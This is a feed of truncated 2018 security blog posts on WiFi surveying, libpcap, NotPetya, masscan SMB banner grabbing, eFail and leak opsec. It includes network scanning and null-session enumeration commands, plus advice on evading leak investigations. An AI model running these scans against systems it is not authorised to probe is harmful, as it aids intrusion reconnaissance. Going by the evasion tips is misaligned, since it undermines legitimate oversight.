ErrataRob.webp 2018-08-07 23:18:45 What the Caesars (@DefCon) WiFi situation looks like (lien direct) So I took a survey of WiFi at Caesar's Palace and thought I'd write up some results. When we go to DEF CON in Vegas, hundreds of us bring our WiFi tools to look at the world. Actually, no special hardware is necessary, as modern laptops/phones have WiFi built-in, while the operating system (Windows, macOS, Linux) enables “monitor mode”. Software is widely available and free. We still love our specialized WiFi dongles and directional antennas, but they aren't really needed anymore. It's also legal, as long as you are just grabbing header information and broadcasts. Which is about all that's useful anymore as encryption has become the norm -- we can pretty much only see what we are allowed to see. The days of grabbing somebody's session-cookie and hijacking their web email are long gone (though that was a fun period). There are still a few targets around if you want to WiFi hack, but most are gone. So naturally I wanted to do a survey of what Caesar's Palace has for WiFi during the DEF CON hacker conference located there. Here is a list of access-points (on channel 1 only) sorted by popularity, the number of stations using them. These have mind-blowingly high numbers in the ~3000 range for “CAESARS”. I think something is wrong with the data. I click on the first one to drill down, and I find a source of the problem. I'm seeing only “Data Out” packets from these devices, not “Data In”. These are almost entirely ARP packets from devices associated with other access-points, not actually associated with this access-point. The hotel has bridged (via Ethernet) all the access-points together. We can see this in the raw ARP packets, such as the one shown below: WiFi packets have three MAC addresses, the source and destination (as expected) and also the address of the access-point involved. The access point is the actual transmitter, but it's bridging the packet from some other location on the local Ethernet network. Apparently, CAESARS dumps all the guests into the address range 10.10.x.x, all going out through the router 10.10.0.1. We can see this from the ARP traffic, as everyone seems to be ARPing that router. I'm probably seeing all the devices on the CAESARS WiFi. In ot Patching
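To reproduce this kind of survey, a capture that prints the link-level (MAC) addresses on each frame is enough; a sketch for macOS, where -I requests monitor mode and en0 is an assumed interface name:

$ sudo tcpdump -I -e -i en0 arp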
ErrataRob.webp 2018-07-27 16:55:05 Some changes in how libpcap works you should know (lien direct) I thought I'd document the solution to this problem I had.

The API libpcap is the standard cross-platform way of sniffing packets off the network. It works on Windows (winpcap), macOS, and all the Unixes. It's better than simply opening a "raw socket" on Unix platforms because it takes advantage of higher-performance capabilities of the system, including specialized sniffing hardware.

Traditionally, you'd open an adapter with pcap_open(), whose function parameters set options like snap length, promiscuous mode, and timeouts. However, in newer versions of the API, what you should do instead is call pcap_create(), then set the options individually with calls to functions like pcap_set_timeout(), then once you are ready to start capturing, call pcap_activate().

I mention this in relation to "TPACKET" and pcap_set_immediate_mode(). Over the years, Linux has been adding a "ring buffer" mode to packet capture. This is a trick where a packet buffer is memory-mapped between user-space and kernel-space. It allows a packet-sniffer to pull packets out of the driver without the overhead of extra copies or system calls that cause a user-kernel space transition. This has gone through several generations.

One of the latest generations causes the pcap_next() function to wait forever for a packet. This happens a lot on virtual machines where there is no background traffic on the network. This looks like a bug, but maybe it isn't. It's unclear what the "timeout" parameter actually means. I've been hunting down the documentation, and curiously, it's not really described anywhere. For an ancient, popular API, libpcap is almost entirely undocumented as to what it precisely does. I've tried reading some of the code, but I'm not sure I've come to any understanding.

In any case, the way to resolve this is to call the function pcap_set_immediate_mode(). This causes libpcap to back off and use an older version of TPACKET, so that it works as expected: even on silent networks the pcap_next() function will time out and return.

I mention this because I fixed this bug in my code. When running inside a VM, my program would never exit. I changed from pcap_open_live() to the pcap_create()/pcap_activate() method instead, adding the setting of "immediate mode", and now things work. Performance seems roughly the same as far as I can tell.

I'm still not certain what's going on here, and there are even newer proposed zero-copy/ring-buffer modes being added to the Linux kernel, so this can change in the future. But in any case, I thought I'd document this in a blogpost in order to help out others who might be encountering the same problem.
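A minimal sketch of the newer open sequence described above, assuming a recent libpcap. The device name "eth0" and the numeric option values are illustrative, not taken from the post:

#include <pcap/pcap.h>
#include <stdio.h>

int main(void)
{
    char errbuf[PCAP_ERRBUF_SIZE];

    /* Create the handle first, so options can be set before activation. */
    pcap_t *p = pcap_create("eth0", errbuf);
    if (p == NULL) {
        fprintf(stderr, "pcap_create: %s\n", errbuf);
        return 1;
    }

    pcap_set_snaplen(p, 65535);     /* capture full packets */
    pcap_set_promisc(p, 1);         /* promiscuous mode */
    pcap_set_timeout(p, 1000);      /* read timeout, in milliseconds */
    pcap_set_immediate_mode(p, 1);  /* the fix: avoids the ring-buffer mode
                                       that makes pcap_next() block forever */

    if (pcap_activate(p) != 0) {
        fprintf(stderr, "pcap_activate: %s\n", pcap_geterr(p));
        return 1;
    }

    struct pcap_pkthdr hdr;
    const unsigned char *pkt = pcap_next(p, &hdr); /* now times out on silent networks */
    if (pkt != NULL)
        printf("captured %u bytes\n", hdr.caplen);

    pcap_close(p);
    return 0;
}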
ErrataRob.webp 2018-07-12 19:54:20 Your IoT security concerns are stupid (lien direct) Lots of government people are focused on IoT security, such as this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.

Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small but manageable, constant hacking problem. Automatic patching causes rarer but more catastrophic events, when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet, which was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, its primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.

Such technical analysis of events like Mirai and notPetya is ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzhen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.

In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100 billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4 billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.

Lastly, focusing on the ven Hack Patching Guideline NotPetya
ErrataRob.webp 2018-06-27 15:49:15 Lessons from nPetya one year later (lien direct) This is the one-year anniversary of NotPetya. It was probably the most expensive single hacker attack in history (so far), with FedEx estimating it cost them $300 million. Shipping giant Maersk and drug giant Merck suffered losses on a similar scale. Many are discussing lessons we should learn from this, but they are the wrong lessons.

An example is this quote in a recent article:

"One year on from NotPetya, it seems lessons still haven't been learned. A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains."

This is an attractive claim. It describes the problem as people being "weak" and the solution as being "strong". If only organizations were strong enough, willing to deal with downtime and disruption, then problems like this wouldn't happen. But this is wrong, at least in the case of NotPetya.

NotPetya's spread was initiated through the Ukrainian company MeDoc, which provided tax accounting software. It had an auto-update process for keeping its software up-to-date. This was subverted in order to deliver the initial NotPetya infection. Patching had nothing to do with this. Other common security controls, like firewalls, were also bypassed.

Auto-updates and cloud-management of software and IoT devices are becoming the norm. This creates a danger of such "supply chain" attacks, where the supplier of the product gets compromised, spreading an infection to all their customers. The lesson organizations need to learn about this is how such infections can be contained. One way is to firewall such products away from the core network. Another solution is port-isolation/microsegmentation, which limits the spread after an initial infection.

Once NotPetya got into an organization, it spread laterally. The chief way it did this was through Mimikatz/PsExec, reusing Windows credentials. It stole whatever login information it could get from the infected machine and used it to try to log on to other Windows machines. If it got lucky getting domain administrator credentials, it then spread to the entire Windows domain. This was the primary method of spreading, not the unpatched ETERNALBLUE vulnerability. This is why it was so devastating to companies like Maersk: it wasn't a matter of a few unpatched systems getting infected, it was a matter of losing entire domains, including the backup systems.

Such spreading through Windows credentials continues to plague organizations. A good example is the recent ransomware infection of the City of Atlanta, which spread much the same way. The limits of the worm were the limits of domain trust relationships. For example, it didn't infect the city airport, because that Windows domain is separate from the city's domains.

This is the most pressing lesson organizations need to learn, the one they are ignoring. They need to do more to prevent desktops from infecting each other, such as through port-isolation/microsegmentation. They need to control the spread of administrative credentials within the organization. A lot of organizations put the same local admin account on every workstation, which makes the spread of NotPetya-style worms trivial. They need to reevaluate trust relationships between domains, so that the admin of one can't infect the others.

These solutions are difficult, which is why news articles don't mention them.
You don't have to know anything about security to proclaim "the problem is lack of patches". It's moral authority, chastising the weak, rather than a prescription of what to do. Solving supply-chain hacks and Windows credential sharing, though, is hard. I don't know any universal solution to this -- I'd have to thoroughly analyze your network and business in order to Ransomware Malware Patching FedEx NotPetya Wannacry
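To make the port-isolation idea concrete, here is one minimal sketch using the firewall built into Windows. The rule name is made up, and the assumption that ordinary workstations never need to accept SMB from their peers is mine; file servers and domain controllers would need different rules:

:: Block inbound SMB (TCP 445) on workstations, so that a worm landing on
:: one desktop can't use stolen credentials to reach its neighbors over SMB.
netsh advfirewall firewall add rule name="Block peer SMB" dir=in action=block protocol=TCP localport=445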
ErrataRob.webp 2018-06-24 19:39:21 SMB version detection in masscan (lien direct) My Internet-scale port scanner, masscan, supports "banner checking", grabbing basic information from a service after it connects to a port. It's less comprehensive than nmap's version and scripting checks, but it's better than just recording which ports are open.

I recently extended this banner checking to include SMB. It's a complicated protocol, so it requires a lot more work than just grabbing text banners like you see on FTP. Implementing this, I've found that nmap and smbclient often fail to get version information. They seem focused on getting the information from a standard location in SMBv1 packets, which gives a text string indicating the version. There's another place you can get it, from the NTLMSSP pluggable authentication chunks, which gives version numbers in the form of major version, minor version, and build number. Sometimes the SMBv1 information is missing, either because newer Windows versions disable SMBv1 by default (supporting only SMBv2) or because they've disabled null/anonymous sessions. They still give NTLMSSP version info, though.

For example, running masscan in my local bar, I get the following result:

Banner on port 445/tcp on 10.1.10.200: [smb] SMBv1 time=2018-06-24 22:18:13 TZ=+240 domain=SHIPBARBO version=6.1.7601 ntlm-ver=15 domain=SHIPBARBO name=SHIPBARBO domain-dns=SHIPBARBO name-dns=SHIPBARBO os=Windows Embedded Standard 7601 Service Pack 1 ver=Windows Embedded Standard 6.1

The top version string comes from NTLMSSP, with 6.1.7601, which means Windows 6.1 (Win7) build number 7601. The bottom version string comes from the SMBv1 packets, which consists of strings.

The nmap and smbclient programs will get the SMBv1 part, but not the NTLMSSP part. This seems to be a problem with Rapid7's "National Exposure Index", which tracks SMB exposure (amongst other things). It's missing about 300,000 machines that report NT_STATUS_ACCESS_DENIED from smbclient rather than the numeric version info from NTLMSSP authentication.

The smbclient program does have the information internally. For example, you could run the following command to put the debug level at '10' to grab it:

$ smbclient -U "" -N -L 10.1.10.95 -d10

You'll get something like the following output: It appears to get the Windows 6.1 numbers, though for some reason it's missing the build number.

To run masscan to grab this, run:

# masscan --banners -p445 10.1.10.95

In the above example, I also used the "--hello smbv1" parameter, to grab both the SMBv1 and NTLMSSP version info. Otherwise, it'll default to SMBv2 if available, and only return: Tool
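Putting the pieces together, a run that forces the SMBv1 greeting, so that both the SMBv1 strings and the NTLMSSP numbers come back, would presumably look like the following. The combined invocation is my sketch based on the parameters the post names, and the target address is illustrative:

# Grab SMB banners, forcing the SMBv1 hello so both version sources appear.
masscan --banners --hello smbv1 -p445 10.1.10.95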
ErrataRob.webp 2018-06-17 01:45:55 Notes on "The President is Missing" (lien direct) Former president Bill Clinton has contributed to a cyberthriller, "The President is Missing", the plot of which is that the president stops a cybervirus from destroying the country. This is scary, because people in Washington D.C. are going to read this book, believe the hacking portrayed has some basis in reality, and base policy on it. This "news analysis" piece in the New York Times is a good example, coming up with policy recommendations based on fictional cliches rather than the reality of what hackers do.

The cybervirus in the book is some all-powerful thing, able to infect everything everywhere without being detected. This is fantasy no more real than magic and faeries. Sure, magic and faeries are a popular basis for fiction, but in this case, it's lazy fantasy, a cliche. In fiction, viruses are rarely portrayed as anything other than all-powerful. But in the real world, viruses have important limitations. If you knew anything about computer viruses, rather than being impressed by what they can do, you'd be disappointed by what they can't.

Go look at your home router. See the blinky lights. The light flashes every time a packet of data goes across the network. Packets can't be sent without a light blinking. Likewise, viruses cannot spread themselves over a network, or communicate with each other, without somebody noticing -- especially a virus that's supposedly infected a billion devices, as in the book.

The same is true of data on the disk. All the data is accounted for. It's rather easy for professionals to see when data (consisting of the virus) has been added. The difficulty of anti-virus software is not in detecting when something new has been added to a system, but automatically determining whether it's benign or malicious. When viruses are able to evade anti-virus detection, it's because they've been classified as non-hostile, not because they are invisible.

Such evasion only works when hackers have a focused target. As soon as a virus spreads too far, anti-virus companies will get a sample, classify it as malicious, and spread the "signatures" out to the world. That's what happened with Stuxnet, a focused attack on Iran's nuclear enrichment program that eventually spread too far and got detected. It's implausible that anything can spread to a billion systems without anti-virus companies getting a sample and correctly classifying it.

In the book, the president creates a team of the 30 brightest cybersecurity minds the country has, from government, the private sector, and even convicted hackers on parole from jail -- each more brilliant than the last. This is yet another lazy cliche about genius hackers. The cliche comes from the fact that it's rather easy to impress muggles with magic tricks. As soon as somebody shows an ability to do something you don't know how to do, they become a cyber genius in your mind. The reality is that cybersecurity/hacking is no different than any other profession, no more dominated by "genius" than bridge engineering or heart surgery. It's a skill that takes both years of study as well as years of experience.

So whenever the president, ignorant of computers, puts together a team of 30 cyber geniuses, they aren't going to be people of competence. They are going to be people good at promoting themselves, taking credit for other people's work, or political engineering.
They won't be technical experts, they'll be people like Rudy Giuliani or Richard Clarke, who have been tapped by presidents as cyber experts despite knowing less than nothing about computers.

A funny example of this is Marcus Hutchins. He's a virus researcher of typical skill and experience, but was catapulted to fame by finding the "kill switch" in the famous Wannacry virus. In truth, he just got lucky, being merely the first to find the kill switch that would've soon been found by another. Wannacry
ErrataRob.webp 2018-05-31 17:06:26 The First Lady's bad cyber advice (lien direct) First Lady Melania Trump announced a guide to help children go online safely. It has problems.

Melania's guide is full of outdated, impractical, inappropriate, and redundant information. But that's allowed, because it relies upon moral authority: to be moral is to be secure, to be moral is to do what the government tells you. It matters less whether the advice is technically accurate, and more that you are supposed to do what authority tells you.

That's a problem, not just with her guide, but with most cybersecurity advice in general. Our community gives out advice without putting much thought into it, because it doesn't need thought. You should do what we tell you, because being secure is your moral duty.

This post picks apart Melania's document. The purpose isn't to fine-tune her guide and make it better. Instead, the purpose is to demonstrate the idea of resting on moral authority instead of technical authority.

Strong Passwords

"Strong passwords" is the quintessential cybersecurity cliché: that insecurity is due to some "weakness" (laziness, ignorance, greed, etc.) and the remedy is to be "strong".

The first flaw is that this advice is outdated. Ten years ago, important websites would frequently get hacked and have poor password protection (like MD5 hashing). Back then, strength mattered, to stop hackers from brute-force guessing the hacked passwords. These days, important websites get hacked less often and protect the passwords better (like salted bcrypt). Moreover, the advice is now often redundant: websites, at least the important ones, enforce a certain level of password complexity, so that even without advice, you'll be forced to do the right thing most of the time.

This advice is outdated for a second reason: hackers have gotten a lot better at cracking passwords. Ten years ago, they focused on brute force, trying all possible combinations. Partly because passwords are now protected better, dramatically reducing the effectiveness of the brute-force approach, hackers have had to focus on other techniques, such as the mutated-dictionary and Markov-chain attacks. Consequently, even though "Password123!" seems to meet the above criteria of a strong password, it'll fall quickly to a mutated-dictionary attack. The simple recommendation of "strong passwords" is no longer sufficient.

The last part of the above advice is to avoid password reuse. This is good advice. However, it becomes impractical advice, especially when the user is trying to create "strong" complex passwords as described above. There's no way users/children can remember that many passwords. So they aren't going to follow that advice.

To make the advice work, you need to help users with this problem. To begin with, you need to tell them to write down all their passwords. This is something many people avoid, because they've been told to be "strong" and writing down passwords seems "weak". Indeed it is, if you write them down in an office environment and stick them on a note on the monitor or underneath the keyboard. But they are safe and strong if on paper stored in your home safe, or even in a home office drawer. I write my passwords on the margins in a
ErrataRob.webp 2018-05-23 18:45:27 The devil wears Pravda (lien direct) Classic Bond villain Elon Musk has a new plan: to create a website dedicated to measuring the credibility and adherence to "core truth" of journalists. He is, without any sense of irony, going to call this "Pravda". This is not simply wrong but evil.

Musk has a point. Journalists do suck, and many suck consistently. I see this in my own industry, cybersecurity, and I frequently criticize them for their suckage. But what he's doing here is not correcting them when they make mistakes (or what Musk sees as mistakes), but questioning their legitimacy. This legitimacy isn't measured by whether they follow established journalism ethics, but by whether their "core truths" agree with Musk's "core truths".

An example of the problem is how the press fixates on Tesla car crashes due to its "autopilot" feature. Pretty much every autopilot crash makes national headlines, while the press ignores the other 40,000 car crashes that happen in the United States each year. Musk spies on Tesla drivers (hello, classic Bond villain, everyone) so he can see the dip in autopilot usage every time such a news story breaks. He's got good reason to be concerned about this.

He argues that autopilot is safer than humans driving, and he's got the statistics and government studies to back this up. Therefore, the press's fixation on Tesla crashes is illegitimate "fake news", titillating the audience with distorted truth. But here's the thing: that's still only Musk's version of the truth. Yes, on a mile-per-mile basis, autopilot is safer, but there's nuance here. Autopilot is used primarily on freeways, which already have a low mile-per-mile accident rate. People choose autopilot only when conditions are incredibly safe and drivers are unlikely to have an accident anyway. Musk is therefore being intentionally deceptive, comparing apples to oranges. Autopilot may still be safer; it's just that the numbers Musk uses don't demonstrate this.

And then there is the matter of calling it "autopilot" to begin with, because it isn't. The public is overrating the capabilities of the feature. It's little different than the "lane keeping" and "adaptive cruise control" you can now find in other cars. In many ways, the technology is behind -- my Tesla doesn't beep at me when a pedestrian walks behind my car while backing up, but virtually every new car on the market does.

Yes, the press unduly covers Tesla autopilot crashes, but Musk has only himself to blame, by unduly exaggerating his car's capabilities by calling it "autopilot".

What's "core truth" is thus rather difficult to obtain. What the press satisfies itself with instead is smaller truths, what they can document. The facts in such cases are that the accident happened, and they try to get Tesla or Musk to comment on it.

What you can criticize a journalist for is therefore not "core truth" but whether they did journalism correctly. When such stories criticize "autopilot" but don't do their diligence in getting Tesla's side of the story, that's a violation of journalistic practice. When I criticize journalists for their poor handling of stories in my industry, I try to focus on which journalistic principles they get wrong. For example, the NYTimes reporters do a lot of stories quoting anonymous government sources in clear violation of journalistic principles.

If "credibility" is the concern, then it's the classic Bond villain h Tesla
ErrataRob.webp 2018-05-23 14:39:01 C is too low level (lien direct) I'm in danger of contradicting myself, after previously pointing out that x86 machine code is a high-level language, but this article claiming C is not a low-level language is bunk. C certainly has some problems, but it's still the closest language to assembly. This is obvious from the fact that it's still the fastest compiled language. What we see is a typical academic out of touch with the real world.

The author makes the (wrong) observation that we've been stuck emulating the PDP-11 for the past 40 years. C was written for the PDP-11, and since then CPUs have been designed to make C run faster. The author imagines a different world, such as one where CPU designers instead target something like LISP as their preferred language, or Erlang. This misunderstands the state of the market. CPUs do indeed support lots of different abstractions, and C has evolved to accommodate this.

The author criticizes things like "out-of-order" execution, which has led to the Spectre side-channel vulnerabilities. Out-of-order execution is necessary to make C run faster. The author claims instead that those resources should be spent on having more, slower CPUs with more threads. This sacrifices single-threaded performance in exchange for a lot more threads executing in parallel. The author cites Sparc Tx CPUs as his ideal processor.

But here's the thing: the Sparc Tx was a failure. To be fair, it's mostly a failure because most of the time people wanted to run old C code instead of new Erlang code. But it was still a failure at running Erlang.

Time after time, engineers keep finding that "out-of-order", single-threaded performance is still the winner. A good example is ARM processors for both mobile phones and servers. All the theory points to in-order CPUs as being better, but all the products are out-of-order, because this theory is wrong. The custom ARM cores from Apple and Qualcomm used in most high-end phones are so deeply out-of-order they give Intel CPUs competition. The same is true on the server front with the latest Qualcomm Centriq and Cavium ThunderX2 processors, deeply out-of-order, supporting more than 100 instructions in flight.

The Cavium is especially telling. Its ThunderX CPU had 48 simple cores, which was replaced by the ThunderX2 having 32 complex, deeply out-of-order cores. The performance increase was massive, even on multithread-friendly workloads. Every competitor to Intel's dominance in the server space has learned the lesson from Sparc Tx: many wimpy cores is a failure; you need fewer beefy cores. Yes, they don't need to be as beefy as Intel's processors, but they need to be close.

Even Intel's "Xeon Phi" custom chip learned this lesson. This is their GPU-like chip, running 60 cores with 512-bit wide "vector" (sic) instructions, designed for supercomputer applications. Its first version was purely in-order. Its current version is slightly out-of-order. It supports four threads and focuses on basic number crunching, so in-order cores seem to be the right approach, but Intel found that even in this case out-of-order processing still provided a benefit. Practice is different than theory.

As an academic, the author of the above article focuses on abstractions.
The criticism of C is that it has the wrong abstractions, which are hard to optimize, and that if we instead expressed things in the right abstractions, it would be easier to optimize. This is an intellectually compelling argument, but so far bunk.

The reason is that while the theoretical base language has issues, everyone programs using extensions to the language, like "intrinsics" (C 'functions' that map to assembly instructions). Programmers write libraries using these intrinsics, which the rest of the normal programmers then use. In other words, if your criticism is that C is not itself low level enou Guideline
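As an illustration of what such intrinsics look like, here is a small generic SSE example (my sketch, not code from the article being rebutted):

#include <immintrin.h>
#include <stddef.h>

/* Add two float arrays four elements at a time. Each _mm_* "function"
 * maps to (roughly) one x86 SSE instruction, which is how C programmers
 * reach below the language's abstract machine. Assumes n is a multiple
 * of 4 to keep the sketch short. */
void add_floats(float *dst, const float *a, const float *b, size_t n)
{
    for (size_t i = 0; i < n; i += 4) {
        __m128 va = _mm_loadu_ps(&a[i]);             /* movups */
        __m128 vb = _mm_loadu_ps(&b[i]);             /* movups */
        _mm_storeu_ps(&dst[i], _mm_add_ps(va, vb));  /* addps + movups */
    }
}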
ErrataRob.webp 2018-05-20 17:15:52 masscan, macOS, and firewall (lien direct) One of the more useful features of masscan is the "--banners" check, which connects to the TCP port, sends some request, and gets a basic response back. However, since masscan has its own TCP stack, it'll interfere with the operating system's TCP stack if they are sharing the same IPv4 address. The operating system will reply with a RST packet before the TCP connection can be established.

The way to fix this is to use the built-in packet-filtering firewall to block those packets in the operating-system TCP/IP stack. The masscan program still sees everything, since it taps the traffic before the packet-filter, but the operating system only sees what gets past the packet-filter.

Note that we are talking about the "packet-filter" firewall feature here. Remember that macOS, like most operating systems these days, has two separate firewalls: an application firewall and a packet-filter firewall. The application firewall is the one you see in System Settings labeled "Firewall", and it controls things based upon the application's identity rather than by which ports it uses. This is normally "on" by default. The packet-filter is normally "off" by default and is of little use to normal users.

Also note that macOS changed packet-filters around version 10.10.5 ("Yosemite", October 2014). The older one is known as "ipfw", which was the default firewall for FreeBSD (much of macOS is based on FreeBSD). The replacement is known as PF, which comes from OpenBSD. Whereas you used to use the old "ipfw" command on the command line, you now use the "pfctl" command, as well as the "/etc/pf.conf" configuration file.

What we need to filter is the source port of the packets that masscan will send, so that when replies are received, they won't reach the operating-system stack, and will just go to masscan instead. To do this, we need to find a range of ports that won't conflict with the operating system. Namely, when the operating system creates outgoing connections, it randomly chooses a source port within a certain range. We want masscan to use source ports in a different range.

To figure out the range macOS uses, we run the following command:

sysctl net.inet.ip.portrange.first net.inet.ip.portrange.last

On my laptop, which is probably the default for macOS, I get the following range. Sniffing with Wireshark confirms this is the range used for source ports for outgoing connections.

net.inet.ip.portrange.first: 49152
net.inet.ip.portrange.last: 65535

So this means I shouldn't use source ports anywhere in the range 49152 to 65535. On my laptop, I've decided to have masscan use the ports 40000 to 41023. The range masscan uses must be a power of 2, so here I'm using 1024 (two to the tenth power).

To configure masscan, I can either type the parameter "--source-port 40000-41023" every time I run the program, or I can add the following line to /etc/masscan/masscan.conf. Remember that by default, masscan will look in that configuration file for any configuration parameters, so you don't have to keep retyping them on the command line.

source-port = 40000-41023

Next, I need to add the following firewall rule to the bottom of /etc/pf.conf:

block in proto tcp from any to any port 40000 >< 41024

However, we aren't do
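The excerpt cuts off here, but the remaining steps would presumably be loading the rules and enabling PF. These are the standard pfctl invocations for that, a sketch rather than a quote from the post:

# Parse the rules file without loading it, to catch syntax errors first.
sudo pfctl -n -f /etc/pf.conf
# Load the rules, then enable the packet filter.
sudo pfctl -f /etc/pf.conf
sudo pfctl -e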
ErrataRob.webp 2018-05-14 09:05:47 Some notes on eFail (lien direct) I've been busy trying to replicate the "eFail" PGP/SMIME bug. I thought I'd write up some notes.

PGP and S/MIME encrypt emails so that eavesdroppers can't read them. The bugs potentially allow eavesdroppers to take the encrypted emails they've captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable "external" or "remote" content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when senders want to display images without filling up the email with them. But most of the time this is illegitimate: they hide images on the webpage in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and the width/height of this image set to one pixel, so you don't even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:

The problem is that as you read email messages, you often get frustrated by the error messages and missing content, so you keep adding exceptions:

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren't to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn't matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That's probably overkill. As long as the attacker can't use the "remote content" in emails, you are fine. Likewise, some have recommended disabling HTML completely. That's not even an option in any email client I've used -- you can disable sending HTML emails, but not receiving them. It's sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn't replicate the direct exfiltration

There are two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like
ErrataRob.webp 2018-05-13 23:21:32 How to leak securely, for White House staffers (lien direct) Spencer Ackerman has this interesting story about a guy assigned to crack down on unauthorized White House leaks. It's necessarily light on technical details, so I thought I'd write up some guesses, either as a guide for future reporters asking questions, or for people who want to know how they can safely leak information.

It should come as no surprise that your work email and phone are already monitored. They can get every email you've sent or received, even if you've deleted it. They can get every text message you've sent or received, the metadata of every phone call sent or received, and so forth.

To a lesser extent, this also applies to your well-known personal phone and email accounts. Law enforcement can get the metadata (which includes text messages) for these things without a warrant. In the above story, the person doing the investigation wasn't law enforcement, but I'm not sure that's a significant barrier if they can pass things on to the Secret Service or something.

The danger here isn't that you used these things to leak, it's that you've used these things to converse with the reporter before you made the decision to leak. That's what happened in the Reality Winner case: she communicated with The Intercept before she allegedly leaked a printed document to them via postal mail. While it wasn't conclusive enough to convict her, the innocent emails certainly put the investigators on her trail.

The path to leaking often starts this way: innocent actions before the decision to leak was made that will come back to haunt the person afterwards. That includes emails. That also includes Google searches. That includes websites you visit (like this one). I'm not sure how to solve this, except that if you've been in contact with The Intercept, and then you decide to leak, send it to anybody but The Intercept.

By the way, the other thing that caught Reality Winner is the records they had of her accessing files and printing them on a printer. Depending on where you work, they may have a record of every file you've accessed and every intranet page you visited. Because of the way printers put secret dots on documents, investigators knew precisely which printer the document leaked to The Intercept was printed on, and when.

Photographs suffer the same problem: your camera and phone tag the photographs with GPS coordinates and the time the photograph was taken, as well as information about the camera. This accidentally exposed John McAfee's hiding location when Vice took pictures of him a few years ago. Some people leak by taking pictures of the screen -- use a camera without GPS for this (meaning, a really old camera you bought from a pawnshop).

These examples should impress upon you the dangers of not understanding technology. As soon as you do something to evade surveillance you know about, you may get caught by surveillance you don't know about.

If you nonetheless want to continue forward, the next step may be to get a "burner phone". You can get an adequate Android "prepaid" phone for cash at the local Walmart, electronics store, or phone store.

There are some problems with such phones, though. They can often be tracked back to the store that sold them, and the store will have security cameras that record you making the purchase. License plate readers and GPS tracking on your existing phone may also place you at that Walmart.

I don't know how to resolve these problems.
Perhaps the best is to grow a beard and, on the last day of your vacation, color your hair, take a long bike/metro ride (without y
ErrataRob.webp 2018-04-25 16:46:42 No, Ray Ozzie hasn't solved crypto backdoors (lien direct) According to this Wired article, Ray Ozzie may have a solution to the crypto backdoor problem. No, he doesn't. He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors; we just don't know how to secure them.

The vault doesn't scale

Yes, Apple has a vault where they've successfully protected important keys. No, it doesn't mean this vault scales. The more people and the more often you have to touch the vault, the less secure it becomes. We are talking thousands of requests per day from 100,000 different law enforcement agencies around the world. We are unlikely to protect this against incompetence and mistakes. We are definitely unable to secure this against deliberate attack.

A good analogy to Ozzie's solution is LetsEncrypt for getting SSL certificates for your website, which is fairly scalable, using a private key locked in a vault for signing hundreds of thousands of certificates. That this scales seems to validate Ozzie's proposal.

But at the same time, LetsEncrypt is easily subverted. LetsEncrypt uses DNS to verify your identity. But spoofing DNS is easy, as was shown in the recent BGP attack against a cryptocurrency. Attackers can create fraudulent SSL certificates with enough effort. We've got other protections against this, such as discovering and revoking the bad SSL certificate, so while damaging, it's not catastrophic.

But with Ozzie's scheme, equivalent attacks would be catastrophic, as they would lead to unlocking the phone and stealing all of somebody's secrets.

In particular, consider what would happen if LetsEncrypt's certificate was stolen (as Matthew Green points out). The consequence is that this would be detected and mass revocations would occur. If Ozzie's master key were stolen, nothing would happen. Nobody would know, and evildoers would be able to freely decrypt phones. Ozzie claims his scheme can work because SSL works -- but then his scheme includes none of the many protections necessary to make SSL work.

What I'm trying to show here is that in a lab it all looks nice and pretty, but when attacked at scale, things break down -- quickly. We have so much experience with failure at scale that we can judge Ozzie's scheme as woefully incomplete. It's not even up to the standard of SSL, and we have a long list of SSL problems.

Cryptography is about people more than math

